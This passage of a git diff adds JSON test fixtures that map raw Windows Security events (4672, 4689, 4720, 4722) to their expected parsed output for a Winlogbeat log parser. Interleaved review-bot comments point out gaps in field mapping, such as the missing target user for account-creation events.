:\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": 
"0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json new file mode 100644 index 000000000..e5beffcf5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4689.json 
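Review bot: In the expected output for security_event_4672.json, `action.properties.PrivilegeList` is pinned as one tab-and-newline-delimited string (`"SeSecurityPrivilege\n\t\t\tSeBackupPrivilege…"`), so any detection on special-logon privileges such as SeDebugPrivilege or SeTakeOwnershipPrivilege has to substring-match across embedded whitespace. The 4720 fixture in this commit carries `NewUACList` and `UserAccountControl` as JSON arrays, though those arrive as arrays from Winlogbeat, so the comparison is only partial. If the parser can split this field, the fixture should pin the list form; if the raw string is the deliberate contract, a short comment in the parser saying so would make that explicit. This is a parser concern outside the hunk; the fixture only records current behaviour.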
@@ -0,0 +1,88 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin 
:\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": "C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": 
"winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json new file mode 100644 index 000000000..96e08b538 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4720.json 
@@ -0,0 +1,127 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":
612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + }, + "expected": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD 
Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": 
"0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json new file mode 100644 index 000000000..94bd16fdf --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4722.json 
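Review bot: The expected output for security_event_4720.json drops the created account: `related.user` shrinks from the input's `["user-name","USER"]` to `["user-name"]`, and there is no `user.target` block even though `TargetUserName` `USER`, `TargetDomainName` and `TargetSid` `S-1-2-3-4-5-6-7` are all present in `action.properties`. The 4634 fixture earlier in this commit does map `TargetDomainName`/`TargetUserName` into `user.target.domain`/`user.target.name`, and 4720 (user account created) is the event where that mapping matters most, since account-creation detections pivot on the target rather than the actor. If the parser already has that mapping for other event ids, extending it to 4720 and adding `"target": {"domain": "RESEAU-COMPANY", "name": "USER"}` under `user` in this expected block is a small change; the parser is outside this hunk, so I cannot tell whether the omission is deliberate.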
@@ -0,0 +1,111 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Elastic Winlogbeat",
+ "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+ }
+ },
+ "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+ },
+ "expected": {
+ "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount 
Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
+ "event": {
+ "action": "User Account Management",
+ "code": "4722",
+ "kind": "event",
+ "module": "security",
+ "original": "A user account was enabled.\n\nSubject:\n\tSecurity 
ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T08:53:57.535000Z",
+ "action": {
+ "id": 4722,
+ "outcome": "success",
+ "properties": {
+ "SubjectDomainName": "DOMAIN",
+ "SubjectLogonId": "0x4a13c3fc",
+ "SubjectUserName": "account-name",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetDomainName": "DOMAIN",
+ "TargetSid": "S-1-2-3-4-5",
+ "TargetUserName": "ACC_NAME"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333",
+ "id": "12345678-abcd-90ef-1234-abcdef123456",
+ "name": "PC01",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "pc01",
+ "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+ "ip": [
+ "1.2.3.4"
+ ],
+ "mac": [
+ "AA-BB-CC-DD-EE-FF"
+ ],
+ "name": "pc01",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "pc01"
+ ],
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "account-name"
+ ]
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "account-name",
+ "target": {
+ "domain": "DOMAIN",
+ "name": "ACC_NAME"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "PC01.domain.com",
+ "event_id": "4722",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x4a13c3fc"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 756,
+ "thread": {
+ "id": 11608
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "13042939152",
+ "task": 
"User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..34874fdfb --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json 
@@ -0,0 +1,112 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Elastic Winlogbeat",
+ "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+ }
+ },
